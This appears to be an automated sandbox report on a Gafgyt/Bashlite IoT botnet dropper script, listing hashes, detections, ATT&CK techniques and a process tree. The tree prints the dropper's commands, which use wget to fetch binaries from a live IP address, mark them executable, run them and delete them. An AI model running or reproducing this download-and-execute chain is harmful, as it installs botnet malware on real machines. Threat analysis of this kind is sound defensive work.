gafgyt | c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
18-02-2025 03:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
Size

2KB
MD5

edb69a08721edbacd3f4e999322f9376
SHA1

db404f115d9138b94e6dae5e103fb05547c515f5
SHA256

c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa
SHA512

b898915b614d1566050e929404e87b4f6c010f34c216febbe449f55715aa23ddbb6e5f763802ba494728bfed756dd341c746ead6c1432782450e8f316b5d582d

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

199.195.248.181:606

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-12.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1535	chmod
1540	chmod
1545	chmod
1556	chmod
1572	chmod
1582	chmod
1592	chmod
1597	chmod
1550	chmod
1561	chmod
1567	chmod
1577	chmod
1587	chmod

Executes dropped EXE 12 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	1536	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/m-p.s-l.Sakura	1541	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/s-h.4-.Sakura	1546	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/x-8.6-.Sakura	1551	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/a-r.m-6.Sakura	1557	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/x-3.2-.Sakura	1562	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/a-r.m-7.Sakura	1568	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/p-p.c-.Sakura	1573	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/i-5.8-6.Sakura	1578	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/m-6.8-k.Sakura	1583	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/p-p.c-.Sakura	1588	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/a-r.m-4.Sakura	1593	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh

Reads system routing table 1 TTPs 2 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	x-8.6-.Sakura
File opened for reading	/proc/net/route	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
File opened for reading	/proc/net/route	x-8.6-.Sakura

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget

/tmp/c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
/tmp/c56795e131771ac897bd38e6c1b82d04a2738b6e9919e45513b217586b8fa9aa.sh
1⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:1530
- /usr/bin/wget
  wget http://199.195.248.181/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1535
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  PID:1536
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:1538
- /usr/bin/wget
  wget http://199.195.248.181/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  PID:1541
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:1543
- /usr/bin/wget
  wget http://199.195.248.181/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1544
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1545
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  PID:1546
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://199.195.248.181/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1549
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:1551
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:1554
- /usr/bin/wget
  wget http://199.195.248.181/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  PID:1557
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:1559
- /usr/bin/wget
  wget http://199.195.248.181/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:1565
- /usr/bin/wget
  wget http://199.195.248.181/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  PID:1568
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:1570
- /usr/bin/wget
  wget http://199.195.248.181/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:1573
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:1575
- /usr/bin/wget
  wget http://199.195.248.181/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1577
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  PID:1578
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:1580
- /usr/bin/wget
  wget http://199.195.248.181/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1581
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1582
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  PID:1583
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:1585
- /usr/bin/wget
  wget http://199.195.248.181/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1586
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1587
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:1588
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:1590
- /usr/bin/wget
  wget http://199.195.248.181/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:1591
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  PID:1593
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:1595
- /usr/bin/wget
  wget http://199.195.248.181/a-r.m-5.Sakura
  2⤵
  PID:1596
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  PID:1598
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:1599

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-4.Sakura

Filesize
98KB

MD5
25e8edf393e1bdebbfa831fdcbc06bf7

SHA1
4d767546327266d75a8e9f3c0fedabc184271953

SHA256
ef1ae483017650a71c5628673d2c1d15da4eeb705a2be8efa9cb7b9be1a4e97c

SHA512
b46b9d6a81a47a4df1efc998c4b12cb0405f65c93031aa01141be16b276190d6bc467774ceb3998db56fcc0f872afcb3919bf94942da8dff030f5a3c2b863ad0

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
6583fef00d7968f710ba11a3c533d11e

SHA1
dbe485aded5b731316b476bba4f1ae660c097f57

SHA256
ff0cdb171c6f565632e8d84c5c312538ab04e95d4161363f15db1881dab8b702

SHA512
74f39b6d6d048f092ba8213884082c2dd8f9de9d1152816db8835c3eda44e1bc881a66eaed23a119289ddc133832969c750dd154ead024e96f82299ea92f15c9

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
cfd1b9ef58aca2295b9852dfca86631c

SHA1
67b13c785b9948667f375465603119a6d0d416b2

SHA256
d5b284521d7306b8278e015d45f4832179d8f11b4c4c55fcf3061df04a57755c

SHA512
564fa2b868e5882258b045533305a858060ab43a3f1093778312031c9d69fd71ad9362485b6bfc1d0dd2a0b6be5b592fb4afa3d5ac18d3366be3c5944dfa8d47

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
06f5b2888f20df83caeed2a84c8b2f38

SHA1
778b8ee69bb6c0295e70ee81a1812b4b5513271c

SHA256
08588de27a94c9dab2d1fd8eb4a646de1c54d6e5bb0a4c6256e3496d2f36f34c

SHA512
30ccb12356092845694d4ad45afe49ff2677cd30c957942104d80c3200131a5cd98468bdc3ebc320ca5a2df82c959eb177465e65ff8e75c2b84a1fc0783063c6

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
156KB

MD5
9c6c5969ee8abaf410448b634c8a80ad

SHA1
0403b12cf2f388f2ad5f4862df9a73f851940ea7

SHA256
9a80f2e59770036cb327c71ddfaa4a7796830d7605f63700cb63a9fcf277c4a0

SHA512
96e2c440395e08d4467588315450c714ad1251c8d559513334d58c0143630a94454e9e6a606db158be2174d6a1f0bf873c1fe9cb1ea1cf66662f1b54dee5da48

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
eef370a47b9f42010d101f46fdad9925

SHA1
f04c04f3ff3c42278cfecba6d8f2e025c5ac72d4

SHA256
c20c7e7dc4bba31a5536b3b4b0e6486f70c3289291d210b8e7b22443d3ed88ea

SHA512
7023993029fc53eb0404c6bc9b3c114648a0a314df3009324a7891d098d630f3a58d6513050efa54a7bee32cd489c7887b5556447f1596d85f293fc62052e9f0

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
adc261971837e24fa2a80a1212e30a9b

SHA1
032ca3be3794879aae018514ebeea517a9c45276

SHA256
ce0b393e0b3cd1eded400ba5f613e57f39b4099a93a00ce78d94b1bf06a0a9fd

SHA512
a88475499d148bb9c22c75606498d2c4bc0ffd2a398ae10ea4c90ea386567eb13cfe50537f5f812c4f14613c11715b3ccddf241e0b2ae1b51598b91d8a902c55

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
4bb284ad16284df96d0c23cbf0dafe56

SHA1
d34f7709163310aad1034ef441c320bcdc01d4d4

SHA256
6adc9b0971978b5a21c74c15d73f4c54824f274304f61ceca8a00f7a253323f4

SHA512
45b873ae5380069d25367b41f8ff868f01e004e5845ab5056e6c1760091b1e89fd546c8488618828928753d24835c5d44925b09f9cb69b0ee66f81e381e9fdbc

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
c120b98b67007fdaa404643b6e6db048

SHA1
02d6eaad10b660fe5548d2df3299cb02471313ad

SHA256
a54dda7c2015f0851162a47152b6324d30461459123f074a729d3c5575b7e785

SHA512
d8d0fdea8fa990ee5017c1c5b5cff05a68461091a6c3b4a5445ccdb561faafccbee300e89e0c48ff41edf4480a59df065e3891f1cd936256315590dc545fc031

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
178abea44cead530f617369b622f3862

SHA1
6261efc9d1c6831d685c5b440e932760de0206d3

SHA256
1e1d2b19e0e6831266b74f0b565defbd1ecc809675937e5dfea7f60a3042c36b

SHA512
4897dd73b5bca91a361c36736503efc1a2538b3bb1e3998bf12dd3baab10b9c4e431680c04159f8c470b8e7034cb40b03c84c5b692f2ffff04c09fb8167603c0

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
507d9df2f173881bb93889bf64510b83

SHA1
0f908b9b65f83a2dfc02bd0bc94da330034582fe

SHA256
9bf6d386347ebccde99755664310da698522fed4a9b5edf40dc0db731871f861

SHA512
15c727955d9f2eac73bf6ea79c43ffe56d14aa5a54873d186585ab083a11d6cc40c16fc327538c8362e48f75a9226fefe89a1360fae36c9d1267d71b542ed503

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads